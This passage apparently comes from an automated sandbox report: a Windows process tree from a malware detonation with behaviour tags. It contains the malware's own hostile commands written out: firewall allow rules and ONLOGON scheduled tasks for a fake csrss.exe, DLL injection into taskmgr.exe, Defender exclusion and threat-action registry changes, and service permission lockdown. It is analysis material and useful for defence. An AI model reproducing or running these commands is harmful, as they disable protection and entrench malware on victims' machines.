    - - C:\Users\Admin\AppData\Local\Temp\u2fk.3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2fk.3.exe"
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2264
      - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        6⤵
        
        PID:5824
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1168
        5⤵
        Program crash
        
        PID:3216
  - - C:\Users\Admin\Pictures\fx1YsP1qlDAnfY4TQQ5RyWVC.exe
      "C:\Users\Admin\Pictures\fx1YsP1qlDAnfY4TQQ5RyWVC.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2876
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2848
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2236
    - - C:\Users\Admin\Pictures\fx1YsP1qlDAnfY4TQQ5RyWVC.exe
        
        "C:\Users\Admin\Pictures\fx1YsP1qlDAnfY4TQQ5RyWVC.exe"
        5⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        Suspicious behavior: EnumeratesProcesses
        
        PID:3960
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1852
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:1876
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3572
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:5172
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Modifies data under HKEY_USERS
        
        PID:5596
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5636
  - - C:\Users\Admin\Pictures\lkLVHXsDUhAgSrtszIRwCQuF.exe
      "C:\Users\Admin\Pictures\lkLVHXsDUhAgSrtszIRwCQuF.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3572
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
    - - C:\Users\Admin\Pictures\lkLVHXsDUhAgSrtszIRwCQuF.exe
        
        "C:\Users\Admin\Pictures\lkLVHXsDUhAgSrtszIRwCQuF.exe"
        5⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:4284
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3508
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:2576
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:5240
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Modifies data under HKEY_USERS
        
        PID:944
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6116
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2576
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:5808
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:4016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5748
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        
        PID:5688
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1044
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:5404
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        7⤵
        
        PID:2504
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        
        PID:3572
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        Launches sc.exe
        
        PID:3668
  - - C:\Users\Admin\Pictures\HNpdMqFjrkn2v8wys1HVMrGB.exe
      "C:\Users\Admin\Pictures\HNpdMqFjrkn2v8wys1HVMrGB.exe"
      4⤵
      Modifies firewall policy service
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Drops file in System32 directory
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:1132
  - - C:\Users\Admin\Pictures\s7UKFsjOH4GYxoiVxdhmjI7j.exe
      "C:\Users\Admin\Pictures\s7UKFsjOH4GYxoiVxdhmjI7j.exe" --silent --allusers=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Modifies system certificate store
      PID:2648
    - - C:\Users\Admin\Pictures\s7UKFsjOH4GYxoiVxdhmjI7j.exe
        
        C:\Users\Admin\Pictures\s7UKFsjOH4GYxoiVxdhmjI7j.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6bade1d0,0x6bade1dc,0x6bade1e8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1716
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\s7UKFsjOH4GYxoiVxdhmjI7j.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\s7UKFsjOH4GYxoiVxdhmjI7j.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2496
    - - C:\Users\Admin\Pictures\s7UKFsjOH4GYxoiVxdhmjI7j.exe
        
        "C:\Users\Admin\Pictures\s7UKFsjOH4GYxoiVxdhmjI7j.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2648 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419135428" --session-guid=dcd66b98-38ec-47bc-b30d-a23bc55511f7 --server-tracking-blob="MWMxMTU2ODgyMWRjYzQxNDkxY2M4ZDExMzk1ZDI0OTcyYmIwZGFlMWQ1OTFhMmZiN2U1ZWNhYzA0ODg3OGFhNDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNTM0ODYyLjg2OTQiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiZTgxN2ZjY2UtMTA2OS00ODg5LWE0M2UtYTI3NjkxMzFiMmVlIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2804000000000000
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        
        PID:3724
      - C:\Users\Admin\Pictures\s7UKFsjOH4GYxoiVxdhmjI7j.exe
        
        C:\Users\Admin\Pictures\s7UKFsjOH4GYxoiVxdhmjI7j.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6b15e1d0,0x6b15e1dc,0x6b15e1e8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2928
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191354281\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191354281\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
        5⤵
        Executes dropped EXE
        
        PID:2572
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191354281\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191354281\assistant\assistant_installer.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2892
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191354281\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191354281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x696038,0x696044,0x696050
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2752
  - - C:\Users\Admin\Pictures\JJgSQqOCMgI4o01fmVr0UOxg.exe
      "C:\Users\Admin\Pictures\JJgSQqOCMgI4o01fmVr0UOxg.exe"
      4⤵
      Executes dropped EXE
      PID:3500
    - - C:\Users\Admin\AppData\Local\Temp\7zSD97.tmp\Install.exe
        
        .\Install.exe /nxdidQZJ "385118" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:1828
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:3576
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3516
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1044
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 13:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\oadLdjw.exe\" em /Dosite_idleu 385118 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:4732
  - - C:\Users\Admin\Pictures\BYTCWsHANP2XMf0jXiEYnxb9.exe
      "C:\Users\Admin\Pictures\BYTCWsHANP2XMf0jXiEYnxb9.exe"
      4⤵
      Executes dropped EXE
      PID:2280
    - - C:\Users\Admin\AppData\Local\Temp\7zS69F0.tmp\Install.exe
        
        .\Install.exe /nxdidQZJ "385118" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5136
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:5588
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:5708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5736
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        
        PID:6000
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 13:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\lzWhHws.exe\" em /cBsite_idMrs 385118 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5272
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:5024
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:4640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2828 -ip 2828
1⤵
PID:5060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1448 -ip 1448
1⤵
PID:424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 3152 -ip 3152
1⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\oadLdjw.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\oadLdjw.exe em /Dosite_idleu 385118 /S
1⤵
- Executes dropped EXE
PID:5264
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Modifies data under HKEY_USERS
  PID:5532
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5652
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5780
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\reg.exe
